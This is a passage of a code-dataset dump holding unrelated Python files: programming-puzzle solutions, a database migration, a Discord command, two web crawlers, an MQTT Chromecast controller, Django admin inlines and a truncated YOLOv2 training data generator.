test cases are given.\n\n\n[Output]\n\nPrint the test case number with a # sign, followed by a space and the number of palindromes found.\n\n\"\"\"\nimport sys\nsys.stdin = open('input.txt','r')\n\ndef rotateMatrix(matrix):\n N = len(matrix)\n new_matrix = [[None]*N for _ in range(N)]\n i = j = 0\n\n # rotate the axes\n for x in range(N-1,-1,-1):\n for y in range(N):\n new_matrix[x][y] = matrix[j][i]\n j += 1\n j = 0\n i += 1\n\n res = [None] * N\n for i in range(N):\n temp = \"\"\n for j in range(N):\n temp += new_matrix[i][j]\n res[i] = temp\n return res\n\ndef isPalindrome(string):\n n = len(string)\n for i in range(len(string)//2):\n if string[i] != string[n-i-1]:\n return False\n return True\n\ndef findPalindrome(matrix,n):\n count = 0\n for m in matrix:\n for i in range(9-n):\n if isPalindrome(m[i:n+i]):\n count += 1\n\n r_matrix = rotateMatrix(matrix)\n for m in r_matrix:\n for i in range(9-n):\n if isPalindrome(m[i:n+i]):\n count += 1\n return count\n\nfor t in range(1,11):\n n = int(input())\n matrix = [input() for _ in range(8)]\n res = findPalindrome(matrix,n)\n print(f\"#{t} {res}\")\n","sub_path":"OnlineJudge/SWExpertAcademy/Problem/D3/1215.py","file_name":"1215.py","file_ext":"py","file_size_in_byte":2468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
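A quick illustrative check of the helpers in the record above (a made-up board, not from the judge's data): with identical alternating rows, every length-3 window in each row is a palindrome, and every column is a constant letter.

# illustrative sanity check, assuming the three functions above are in scope
board = ["ABABABAB"] * 8
assert isPalindrome("ABA") and isPalindrome("ABBA") and isPalindrome("A")
# 6 windows per row and 6 per column, 8 rows + 8 columns -> 48 + 48
print(findPalindrome(board, 3))  # 96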
+{"seq_id":"144135786","text":"\"\"\"update Post\n\nRevision ID: ae9387586fdf\nRevises: b2bd5e75eb40\nCreate Date: 2017-03-31 11:36:42.009322\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'ae9387586fdf'\ndown_revision = 'b2bd5e75eb40'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('posts', sa.Column('img', sa.String(length=255), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('posts', 'img')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/ae9387586fdf_update_post.py","file_name":"ae9387586fdf_update_post.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"307762720","text":"from policy import AccessControl\nfrom discord import Client, Message\nfrom management import check_category\n\nSHORT_HELP_TEXT = '$$$category [categoria] - Altera a categoria em que são criados novos canais'\n\ndef help(**kwargs) -> str:\n \"\"\"\n Show help\n \"\"\"\n return SHORT_HELP_TEXT\n\n@AccessControl(roles=['Staff'], relax_pm=True)\nasync def run(client: Client, message: Message, **kwargs) -> None:\n await check_category(kwargs[\"args\"][0])\n await message.channel.send(content=\"Feito\")\n","sub_path":"hooks/commands/category.py","file_name":"category.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"52764075","text":"import urllib.request\nimport urllib.parse\nimport urllib\nimport random\nimport chardet\nfrom bs4 import BeautifulSoup\nimport re\ncrawlerUrl1=\"https://news.qq.com/a/20180312/035287.htm\"\ncrawlerUrl2=\"http://www.baidu.com/\"\ncrawlerUrl3=\"http://10.137.55.248:8090/\"\ncrawlerUrl4=\"https://hanyu.baidu.com/zici/s?wd=%E9%BE%9C\"\n\n\n# page encoding (fallback; replaced by chardet detection below)\nencoding=\"utf-8\"\n\npostBody=urllib.parse.urlencode({\n \"name\":\"name\",\n \"pass\":\"pass\"\n }).encode(\"utf-8\")\n\n\nproxy_list = [\n {\"http\":\"fwx377318:fj3224390@@127.0.0.1:8080\"}\n]\n\nUSER_AGENTS = [\n \"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)\",\n \"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)\",\n \"Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)\",\n \"Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30)\",\n \"Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6\",\n \"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1\",\n \"Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0\",\n \"Mozilla/5.0 (X11; Linux i686; U;) Gecko/20070322 Kazehakase/0.4.5\"\n]\n\n\n# randomly pick a proxy to use\nproxyDic = random.choice(proxy_list)\n# pick a User-Agent for the request headers\nuser_agent = random.choice(USER_AGENTS)\n\n\n\n\n\n# set up the proxy\n# proxy=urllib.request.ProxyHandler(proxyDic)\n# opener=urllib.request.build_opener(proxy,urllib.request.HTTPHandler)\n# urllib.request.install_opener(opener)\n\n\n# build the request\nreq=urllib.request.Request(crawlerUrl4)\nreq.add_header(\"User-Agent\",user_agent)\n#req.add_header(\"Cookie\",\"BAIDUID=D8F571E0C0FBBF8578920341274B5E49:FG=1; BIDUPSID=D8F571E0C0FBBF8578920341274B5E49; PSTM=1515860626; BD_UPN=12314753; H_PS_PSSID=1456_21106_18559_22157; BDORZ=B490B5EBF6F3CD402E515D22BCDA1598; BD_CK_SAM=1; PSINO=3; BD_HOME=0; H_PS_645EC=f7edPjbi2a1VIdyzehiUXlUwqqlF3aVCNaM8ezO4SHP1rMP3AiJCESfeVoE\")\n#req.add_header(\"Accept\",\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\")\n#req.add_header(\"Accept-Encoding\",\"gzip, deflate, 
br\")\n#req.add_header(\"Accept-Language\",\"zh-CN,zh;q=0.9\")\n#req.add_header(\"Cache-Control\",\"max-age=0\")\n#req.add_header(\"Connection\",\"keep-alive\")\n# req.data=postBody # attach the request body\n\ntry:\n #ip(ippools)\n TestData = urllib.request.urlopen(req).read()\n # detect the encoding of the response\n encodeDic = chardet.detect(TestData)\n for key, value in encodeDic.items():\n if (key == \"encoding\"):\n encoding = value\n # fetch the final data\n sourceHtml = urllib.request.urlopen(req).read().decode(encoding, \"ignore\")\n\n if(sourceHtml!=\"\"):\n soup = BeautifulSoup(sourceHtml, \"lxml\")\n result= soup.select_one(\"#pinyin\").find_all(\"b\")\n # result=soup.title.get_text()\n print(result)\n print(len(sourceHtml))\nexcept Exception as err:\n print(\"Error: {0}\".format(err))\n","sub_path":"通用请求代码.py","file_name":"通用请求代码.py","file_ext":"py","file_size_in_byte":3279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"154186887","text":"\n# mqttcast\n# (c) Copyright Si Dunford, June 2020\n# VERSION 0.3\n\n\"\"\"\nCHANGES\n26 JUN 2020 V0.0 INITIAL VERSION\n27 JUN 2020 V0.1 Added Basic (string) and Extended (json) command support:\n V0.2 Added reboot and quit\n28 JUN 2020 V0.3 Added forward,rewind,start,end,replay,seek and skip\n Fixed several bugs\n Published to GITHUB\n\"\"\"\n\nimport configparser, json, sys, time\nimport pychromecast\nimport paho.mqtt.client as paho\nimport traceback\n\nAPPNAME = 'mqttcast'\ndevices = {}\nconfig = configparser.ConfigParser()\nmqtt=None\n\ndef on_connect( client, userdata, flags, rc ):\n print( \"- MQTT connected with result code \"+str(rc))\n print( \"- Subscribing to chromecast/+/command\" )\n client.subscribe( \"chromecast/+/command\" )\n \ndef on_message( client, userdata, msg ):\n try: \n #topic = msg.topic\n name = msg.topic.split(\"/\")[1]\n device_name = get_name( name )\n if device_name in devices:\n device = devices[ device_name ]\n payload = msg.payload.decode()\n try:\n action = json.loads(payload)\n except ValueError:\n action = { \"action\":payload }\n print( \"MSG: \"+name+\" // \" + str(action) ) \n device.command( action )\n \n except Exception as e:\n #exception_type, exception_object, exception_traceback = sys.exc_info()\n print( \"ON_MESSAGE EXCEPTION\" )\n #print( str(e)+\" at line \"+str(exception_traceback.tb_lineno) )\n traceback.print_exc()\n\nsupported_actions = { 'continue', 'end', 'forward', 'mute', 'pause', 'play', 'quit', 'reboot', 'replay', 'rewind', 'seek', 'skip', 'start', 'stop', 'unmute', 'volume', 'voldown', 'volup' }\nclass Chromecast:\n \n def __init__( self, name, device ):\n self.name = name\n self.device = device\n device.wait()\n #self.sendDeviceStatus()\n self.device.register_status_listener(self)\n self.device.media_controller.register_status_listener(self)\n \n def close( self ):\n pass\n \n def new_media_status( self, status ):\n print( \"MEDIA STATUS:\"+str(status) )\n retval = mqtt.publish( \"chromecast/{}/media-status\".format(self.device.name), str(status) )\n \n def new_cast_status( self, status ):\n print( \"CAST STATUS:\"+str(status) )\n retval = mqtt.publish( \"chromecast/{}/cast-status\".format(self.device.name), str(status) )\n \n def command( self, action ):\n # Dispatch method:\n cmd = action.get( 'action','' ).lower()\n data = action.get( 'data','' )\n meta = action.get( 'meta','' )\n # Prevent command injection\n if cmd in supported_actions:\n # Get the method from 'self'. 
Default to a lambda.\n method = getattr( self, \"action_\"+cmd, lambda: \"action_invalid\" )\n # Call the method as we return it\n return method( data, meta )\n\n def action_invalid( self, data, meta ):\n print( \"INVALID COMMAND\")\n\n def action_continue( self, data, meta ):\n self.device.media_controller.play()\n\n def action_end( self, data, meta ):\n # Seek to end of the current media\n duration = self.device.media_controller.status.duration\n self.device.media_controller.seek( duration )\n \n def action_forward( self, data, meta ):\n try:\n skip = int( data )\n except ValueError:\n skip = 30\n if skip==0: skip = 30\n duration = self.device.media_controller.status.duration\n time = self.device.media_controller.status.current_time\n seek = min(time + skip, duration )\n self.device.media_controller.seek( seek )\n \n def action_mute( self, data, meta ):\n self.device.set_volume_muted(True)\n \n def action_pause( self, data, meta ):\n self.device.media_controller.pause()\n \n def action_play( self, url, meta ):\n if url=='':\n self.device.media_controller.play()\n else:\n self.device.media_controller.play_media( url, meta )\n\n def action_quit( self, data, meta ):\n self.device.quit_app()\n\n def action_reboot( self, data, meta ):\n self.device.reboot()\n \n def action_replay( self, data, meta ):\n # Seek to start of the current media\n self.device.media_controller.seek( 0 )\n\n def action_rewind( self, data, meta ):\n try:\n skip = int( data )\n except ValueError:\n skip = 30\n if skip==0: skip = 30\n time = self.device.media_controller.status.current_time\n seek = max(time - skip, 0 )\n self.device.media_controller.seek( seek )\n\n def action_seek( self, data, meta ):\n seek = float( data )\n self.device.media_controller.seek( seek )\n \n def action_skip( self, data, meta ):\n # Seek to end of the current media\n duration = self.device.media_controller.status.duration\n self.device.media_controller.seek( duration )\n \n def action_start( self, data, meta ):\n # Seek to start of the current media\n self.device.media_controller.seek( 0 )\n \n def action_stop( self, data, meta ):\n self.device.media_controller.stop()\n\n def action_unmute( self, data, meta ):\n self.device.set_volume_muted(False)\n \n def action_volume( self, level, meta ):\n # level must be between 0 and 1\n level = min(float( level ) / 10,1)\n self.device.set_volume(level)\n \n def action_voldown( self, data, meta ):\n self.device.volume_down()\n \n def action_volup( self, data, meta ):\n self.device.volume_up()\n \n#cast.media_controller.play_media(args.url, \"audio/mp3\")\n\n \n#def list_devices():\n# print(\"Currently known cast devices:\")\n# for name, service in listener.services.items():\n# print(\"-> \"+str(name)+\"\\n \"+str(service))\n\n# Look up friendly name and return device name\ndef get_name( friendly ):\n for device in devices:\n if devices[device].device.name==friendly:\n return device\n return None\n\ndef publish_status( status, device ):\n topic = \"chromecast/{}/device-status\".format(device.name)\n message = {\n 'status':status,\n 'name':device.name,\n 'type':device.cast_type,\n 'model':device.model_name,\n 'host':device.host\n }\n retval = mqtt.publish( topic, json.dumps( message ) )\n \ndef add_callback(name):\n #https://www.reddit.com/r/homeautomation/comments/4fc01z/quick_question_for_openhab_users/d28vnc4/\n #https://www.domoticz.com/forum/viewtopic.php?t=7022&start=20\n #https://community.openhab.org/t/google-cast-audio-chromecast-control/9991\n \n #name is the dictionary key to find\n #the 
chromecast metadata in listener.services.\n \n if name not in devices and name in listener.services:\n device = pychromecast.get_chromecast_from_host(listener.services[name])\n print( \"ADDING NEW DEVICE: \"+device.name )\n #print( listener.services[name] )\n print( str(device) )\n #print( device.name, device.cast_type )\n devices[name] = Chromecast( name, device )\n publish_status( \"online\", device )\n #retval = mqtt.publish( \"chromecast/{}/device\".format(device.name), \"ONLINE\" ) \n\ndef remove_callback(name, service):\n #print(\"Lost cast device {} {}\".format(name, service))\n if name in devices:\n publish_status( \"offline\", devices[name].device )\n print( str(devices[name].device) )\n #retval = mqtt.publish( \"chromecast/{}/device\".format(devices[name].name), \"OFFLINE\" )\n devices[name].close()\n del devices[name]\n #list_devices()\n\ndef update_callback(name):\n #print(\"Update cast device {}\".format(name))\n if name in devices:\n print( str(devices[name].device) )\n publish_status( \"update\", devices[name].device )\n #retval = mqtt.publish( \"chromecast/{}/device\".format(devices[name].name), \"UPDATE\" )\n\n\"\"\"\nclass StatusListener:\n def __init__(self, name, cast):\n self.name = name\n self.cast = cast\n\n def new_cast_status(self, status):\n print(\"[\", time.ctime(), \" - \", self.name, \"] status chromecast change:\")\n print(status)\n\n\nclass StatusMediaListener:\n def __init__(self, name, cast):\n self.name = name\n self.cast = cast\n\n def new_media_status(self, status):\n print(\"[\", time.ctime(), \" - \", self.name, \"] status media change:\")\n print(status)\n\"\"\"\n\ndef Main():\n global mqtt\n config.read('config.ini')\n \n # Default MQTT section\n if not 'mqtt' in config:\n config['mqtt']={}\n host = config['mqtt']\n \n # MQTT\n mqtt = paho.Client( APPNAME, clean_session=False )\n hostname = host.get('host','127.0.0.1')\n hostport = host.getint('port',1883)\n if 'username' in host:\n username = host.get('username','user')\n password = host.get('password','password')\n print( \"- MQTT: \"+username+\"@\"+hostname+\":\"+str(hostport) ) \n mqtt.username_pw_set( username, password )\n else:\n print( \"- MQTT: \"+hostname+\":\"+str(hostport) ) \n \n try:\n\n mqtt.connect( hostname, hostport , 60 )\n except Exception as e:\n #logging.critical( str(e) )\n print( e )\n sys.exit()\n \n mqtt.on_connect = on_connect\n mqtt.on_message = on_message\n mqtt.loop_forever()\n mqtt.disconnect()\n \n #while True:\n # time.sleep(1)\n\nif __name__==\"__main__\":\n\n # Start Chromecast discovery\n listener = pychromecast.CastListener(add_callback, remove_callback, update_callback)\n browser = pychromecast.discovery.start_discovery(listener)\n\n try:\n Main()\n except KeyboardInterrupt:\n pass\n\n pychromecast.stop_discovery(browser)\n","sub_path":"mqttcast.py","file_name":"mqttcast.py","file_ext":"py","file_size_in_byte":9842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"585288611","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Jul 8 19:58:46 2017\n\n@author: Khepri\n\"\"\"\nimport numpy as np\n\ndef import_pfile(filename):\n global parameters\n parameters = np.genfromtxt(filename, dtype=str, delimiter=',')\n \ndef set_variables(param):\n global a\n global b\n global c\n global d\n global e\n global f\n\n \n a = float(param[0][2])\n b = float(param[1][2])\n c = float(param[2][2])\n d = float(param[3][2])\n e = float(param[4][2])\n f = float(param[5][2])\n return(a,b,c,d,e,f)\n \ndef function():\n answer= 
a*b+c/d-e*f\n return(answer)\n\n","sub_path":"TesterFunction.py","file_name":"TesterFunction.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"53586518","text":"from typing import Union\n\n\ndef sun_angle(time: str) -> Union[int, str]:\n hour = int(time[:2])\n if 6 <= hour <= 18: # Hour is between dawn and dusk\n minutes = ((hour - 6) * 60) + int(time[3:])\n\n if minutes > 720:\n return \"I don't see the sun!\"\n angle = round((0.25 * minutes), 2)\n return angle\n else:\n return \"I don't see the sun!\"\n\n\nif __name__ == '__main__':\n print(\"Example:\")\n print(sun_angle(\"07:00\"))\n\n # These \"asserts\" using only for self-checking and not necessary for auto-testing\n assert sun_angle(\"07:00\") == 15\n assert sun_angle(\"01:23\") == \"I don't see the sun!\"\n print(\"Coding complete? Click 'Check' to earn cool rewards!\")\n","sub_path":"Sun Angle/mission.py","file_name":"mission.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"637996864","text":"# -*- coding: utf-8 -*-\n\nimport time, datetime, re, hashlib, os, sys\nfrom time import sleep\nfrom selenium.common.exceptions import NoSuchElementException, NoSuchAttributeException, TimeoutException\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\n#import crawlerfun\n\nclass Realli:\n def __init__(self, d):\n timeStamp = time.time()\n timeArray = time.localtime(timeStamp)\n self.date = time.strftime('%Y-%m-%d %H:%M:%S', timeArray)\n self.d = d\n self.dir = self._dir = self.source = ''\n # self.ipnum = crawlerfun.ip2num('61.130.181.229')\n self.debug = True\n\n\n def crawl(self):\n print('\\n', '-' * 10, 'https://realli.org/#/', '-' * 10, '\\n')\n self.i = 0\n self.browser = webdriver.Firefox()\n self.browser.set_window_position(x = 680, y = 0)\n n = 0\n\n keywords = ['', 'report']\n\n for keyword in keywords:\n self.keyword = keyword\n try:\n url = 'https://realli.org/#/' + keyword\n self.browser.get(url)\n except TimeoutException:\n n = -1\n break\n\n for i in range(5):\n if keyword == '':\n newsList = self.browser.find_elements_by_css_selector('div.posts > div.post.multi')\n length = len(newsList)\n\n for i in range(length):\n item = self.browser.find_elements_by_css_selector('div.posts > div.post.multi')[i]\n dateTime = item.find_element_by_css_selector('div.post__oper > span:nth-child(3)').text\n if '前' in dateTime:\n self.extract(item)\n else:\n break\n elif keyword == 'report':\n newsList = self.browser.find_elements_by_css_selector('ul.list > li')\n length = len(newsList)\n\n for i in range(length):\n item = self.browser.find_elements_by_css_selector('ul.list > li')[i]\n pubTime = item.find_element_by_css_selector('div.info > div.oper > span:nth-child(4)').text\n dateTime = pubTime.replace('发布', '')\n if dateTime in self.date:\n self.extract(item)\n else:\n break\n\n\n # if self.i < length:\n # break\n # else:\n # try:\n # self.browser.find_element_by_css_selector('div.more_con > a').click()\n # except NoSuchElementException:\n # break\n\n\n print('quantity:', self.i)\n if n == 0:\n if self.i > 0:\n # self.rename()\n # self.expire()\n # self.deleteFiles()\n\n return 'complete', self.source, 'ok'\n else:\n return 'complete', 'none', 'ok'\n else:\n return 'interrupt', 'none', 
'error'\n\n\n # extract the info for a single item\n def extract(self, item):\n titleInfo = item.find_element_by_css_selector('div.post__title')\n title = titleInfo.text\n try:\n md5 = self.makeMD5(title)\n\n # dict filter\n if md5 in self.d:\n return\n else:\n self.d[md5] = self.date.split(' ')[0] # insert the record into the dict\n self.i += 1\n\n\n titleInfo.click()\n self.source, href = self.getPageText()\n\n # self.write_new_file(href, title, self.source, self.i, self.date, 1161565)\n self.browser.back()\n sleep(2)\n except Exception:\n self.i -= 1\n return\n\n\n def getPageText(self): # fetch the page body\n try:\n pageHTML = self.browser.find_element_by_css_selector('div.detail').get_attribute('innerHTML')\n except NoSuchElementException:\n pageHTML = self.browser.page_source\n\n link = self.browser.current_url\n\n return pageHTML, link\n\n\n # generate the md5 digest\n def makeMD5(self, link):\n m = hashlib.md5()\n b = link.encode(encoding = 'utf-8')\n m.update(b)\n enc = m.hexdigest()\n\n return enc\n\n\n # delete expired records\n def expire(self):\n # collect expired entries\n li = []\n current = self.date.split(' ')[0]\n for k, v in self.d.items():\n if current != v:\n li.append(k)\n\n # drop the expired entries from the dict\n for i in li:\n self.d.pop(i)\n\n # rewrite the txt file\n try:\n fileName = '/home/zran/src/crawler/33/manzhua/crawlpy3/record/cnstock_md5.txt'\n os.remove(fileName)\n with open(fileName, 'a+') as f:\n f.write(str(self.d))\n except Exception as e:\n print(e)\n\n\n # rename the folders\n def rename(self):\n try:\n root = '/estar/newhuike2/1/'\n lst = os.listdir(root)\n for l in lst:\n if '_' in l:\n os.rename(root + l, root + l.strip('_'))\n except:\n pass\n\n def deleteFiles(self):\n filePath = '/root/estar_save/cnstock/'\n timeStamp = time.time()\n timeArray = time.localtime(timeStamp)\n current = time.strftime(\"%Y-%m-%d\", timeArray)\n name = os.listdir(filePath)\n\n for i in name:\n try:\n fileName = filePath + i\n fileInfo = os.stat(fileName)\n except FileNotFoundError:\n continue\n ts = fileInfo.st_mtime\n timeArr = time.localtime(ts)\n date = time.strftime(\"%Y-%m-%d\", timeArr)\n if current != date:\n os.remove(fileName)\n\n\nif __name__ == '__main__':\n r = Realli({})\n r.crawl()","sub_path":"crawl/hangye_web/realli/realli.py","file_name":"realli.py","file_ext":"py","file_size_in_byte":6077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"423219617","text":"from django.contrib import admin\nfrom django.shortcuts import reverse\nfrom django.utils.safestring import mark_safe\nfrom django.template.defaultfilters import escape\nfrom django.db import models as django_models\nfrom django import forms\n\nfrom . 
import models\n\n\nclass MailSentInline(admin.TabularInline):\n model = models.MailSent\n fields = ('recipient_link', 'datestamp', 'last_opened')\n readonly_fields = ('recipient_link', 'datestamp', 'last_opened')\n empty_value_display = '(Not yet)'\n extra = 0\n max_num = 0\n can_delete = False\n\n def recipient_link(self, obj):\n return mark_safe(\n '{display_name}'.format(\n url=reverse(\"admin:wedding_person_change\",\n args=(obj.recipient.pk,)),\n display_name=escape(obj.recipient.name)))\n recipient_link.short_description = \"Who\"\n\n\nclass NeedToSendInline(admin.TabularInline):\n model = models.NeedToSend\n extra = 0\n show_change_link = True\n formfield_overrides = {\n django_models.TextField: {'widget': forms.TextInput},\n }\n\n\nclass NoteInline(admin.TabularInline):\n model = models.Note\n extra = 0\n fields = ('content', 'created')\n readonly_fields = ('created',)\n formfield_overrides = {\n django_models.TextField: {'widget': forms.Textarea(attrs={'rows': 2, 'cols': 80})},\n }\n\n\nclass MailoutImageInline(admin.TabularInline):\n model = models.MailoutImage\n extra = 1\n\n\nclass PersonInline(admin.TabularInline):\n model = models.Person\n extra = 0\n show_change_link = True\n\n formfield_overrides = {\n django_models.TextField: {'widget': forms.TextInput},\n }\n\n\nclass GroupInlineForEvents(admin.TabularInline):\n model = models.Event.groups.through\n fields = ('group_link', )\n readonly_fields = ('group_link',)\n extra = 0\n max_num = 0\n verbose_name = 'invited group'\n\n def group_link(self, obj):\n return mark_safe(\n '{display_name}'.format(\n url=reverse(\"admin:wedding_group_change\",\n args=(obj.group.pk,)),\n display_name=escape(obj.group.display_name)))\n group_link.short_description = \"Group\"\n\n\nclass GroupInlineForDetailsSections(admin.TabularInline):\n model = models.DetailsSection.groups.through\n fields = ('group_link', )\n readonly_fields = ('group_link',)\n extra = 0\n max_num = 0\n verbose_name = 'invited group'\n\n def group_link(self, obj):\n return mark_safe(\n '{display_name}'.format(\n url=reverse(\"admin:wedding_group_change\",\n args=(obj.group.pk,)),\n display_name=escape(obj.group.display_name)))\n group_link.short_description = \"Group\"\n","sub_path":"animportantdate/wedding/admin_inlines.py","file_name":"admin_inlines.py","file_ext":"py","file_size_in_byte":2806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"652083958","text":"\"\"\"\nThis is a script that can be used to retrain the YOLOv2 model for your own dataset.\n\"\"\"\nimport argparse\n\nimport os\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pickle\nfrom PIL import Image\nimport cv2\nimport tensorflow as tf\nfrom keras import backend as K\nfrom keras.layers import Input, Lambda, Conv2D\nfrom keras.models import load_model, Model\nfrom keras.callbacks import TensorBoard, ModelCheckpoint, EarlyStopping\nfrom keras.preprocessing.image import Iterator\n\nfrom yad2k.models.keras_yolo import (preprocess_true_boxes, yolo_body,\n yolo_eval, yolo_head, yolo_loss)\nfrom yad2k.utils.draw_boxes import draw_boxes\n\nfrom xml.dom.minidom import parse\nimport xml.dom.minidom\nfrom tqdm import tqdm\n\nimport glob\nimport random\nimport os\n\n\ntarget_width = 416*2\ntarget_height = 416*2\n\nclass ImageDataGenerator(Iterator):\n\n def __init__(self, data_path, batch_size,anchors, shuffle=True, seed=None):\n\n with open(data_path, mode='rb') as f:\n data = pickle.load(f)\n\n\n self.image_paths = data['images']\n self.boxes = 
data['boxes']\n self.anchors = anchors\n\n\n return super().__init__(len(self.image_paths), batch_size, shuffle, seed)\n\n def next(self):\n\n with self.lock:\n index_array, current_index, current_batch_size = next(self.index_generator)\n\n batch_image_paths = np.array(self.image_paths)[index_array]\n batch_boxes = np.array(self.boxes)[index_array]\n\n image_data, boxes = process_data(batch_image_paths, batch_boxes)\n\n detectors_mask, matching_true_boxes = get_detector_mask(boxes, self.anchors)\n\n return [image_data, boxes, detectors_mask, matching_true_boxes], np.zeros(len(image_data))\n\n\nclass ImageDataGeneratorXML_RegionCNN(Iterator):\n \"\"\"description of class\"\"\"\n\n def __init__(self, xml_paths, batch_size,anchors, operations_dict = None, shuffle=True, seed=None):\n\n self.anchors = anchors\n\n self.image_paths = []\n self.boxes = []\n for xml_path in tqdm(xml_paths):\n image_path, image_boxes = self._convert_xml(xml_path)\n\n self.image_paths.append(image_path)\n self.boxes.append(image_boxes)\n\n self.image_paths = np.array(self.image_paths)\n self.boxes = np.array(self.boxes)\n\n self.operations_dict = operations_dict\n if self.operations_dict is None:\n self.operations_dict = {}\n\n return super().__init__(len(self.image_paths), batch_size, shuffle, seed)\n \n def next(self):\n\n with self.lock:\n index_array, current_index, current_batch_size = next(self.index_generator)\n\n batch_image_paths = self.image_paths[index_array]\n batch_boxes = self.boxes[index_array]\n\n result_images = []\n result_boxes = []\n \n for image_path, image_boxes in zip(batch_image_paths,batch_boxes):\n image_boxes = image_boxes.copy()\n\n\n basic_path = \"C:/Users/Bronzi/Downloads/Train/\"\n image_path = os.path.join(basic_path,image_path.split(\"\\\\\")[-1])\n image = cv2.imread(image_path) # replace with the default image loader\n\n for operation_key, operation_value in self.operations_dict.items():\n\n # randomly skip this augmentation for this sample half of the time\n if np.random.choice([1,0],1)[0] == 1:\n continue\n\n if operation_key.lower() == \"flip\".lower():\n image, image_boxes = flip_image(image,image_boxes,np.random.choice(operation_value,1)[0])\n continue\n\n if operation_key.lower() == \"random_shift\".lower() and np.random.choice([1,0],1)[0] == 1:\n image, image_boxes = random_shift(image,operation_value[\"max_x_shift\"],operation_value[\"max_y_shift\"],image_boxes)\n continue\n\n if operation_key.lower() == \"intensity_shift\".lower():\n for channel, value in operation_value:\n image = image_intensity_shift(image,value,channel)\n continue\n\n if operation_key.lower() == \"new_background\".lower():\n image = new_background_image(image,operation_value[\"alpha\"],np.random.choice(operation_value[\"paths\"],1)[0]) \n continue\n\n if operation_key.lower() == \"new_background_mask\".lower():\n image = new_background_image_mask(image,image_boxes.copy(),operation_value[\"alpha\"],np.random.choice(operation_value[\"paths\"],1)[0]) \n continue\n\n image_data, boxes = process_data_new(image,image_boxes)\n \n result_images.append(image_data)\n result_boxes.append(boxes)\n\n\n # find the max number of boxes\n max_boxes = 0\n for boxz in result_boxes:\n if len(boxz) > max_boxes:\n max_boxes = len(boxz)\n\n # add zero pad for training\n for i, boxz in enumerate(result_boxes):\n if len(boxz) < max_boxes:\n zero_padding = np.zeros( (max_boxes-len(boxz), 5), dtype=np.float32)\n result_boxes[i] = np.vstack((boxz, zero_padding))\n\n\n\n result_images = np.array(result_images)\n result_boxes = 
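# Editor's note: a small, self-contained numpy illustration of the
# zero-padding step used in next() above, which makes every sample in a
# batch carry the same number of (class, x_min, y_min, x_max, y_max) rows.
import numpy as np

boxes_per_image = [np.ones((2, 5)), np.ones((4, 5))]
max_boxes = max(len(b) for b in boxes_per_image)
padded = [np.vstack((b, np.zeros((max_boxes - len(b), 5), dtype=np.float32)))
          if len(b) < max_boxes else b
          for b in boxes_per_image]
assert all(b.shape == (max_boxes, 5) for b in padded)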
np.array(result_boxes)\n\n detectors_mask, matching_true_boxes = get_detector_mask(result_boxes, self.anchors)\n\n return [result_images, result_boxes, detectors_mask, matching_true_boxes], np.zeros(len(index_array))\n \n def _convert_xml(self, xml_path):\n DOMTree = xml.dom.minidom.parse(xml_path)\n collection = DOMTree.documentElement\n\n image_path = collection.getElementsByTagName(\"Datei\")[0].getAttribute(\"Name\")\n \n sub_image_rechts = []\n for marker in collection.getElementsByTagName(\"Marker\"):\n if marker.getAttribute(\"Type\") == \"S_ROI\":\n \n pattern_id = 1\n for label in marker.getElementsByTagName(\"Label\"):\n # check json for correct name to label conversion. \n if label.getAttribute(\"value\") == \"pos\":\n pattern_id = 1\n\n for rect in marker.getElementsByTagName(\"Rect\"):\n x_min = max(0, int(rect.getAttribute(\"x\")))\n y_min = max(0, int(rect.getAttribute(\"y\")))\n\n x_max = x_min + int(rect.getAttribute(\"width\")) \n y_max = y_min + int(rect.getAttribute(\"height\"))\n \n ## class, x_min, y_min, x_max, y_max\n 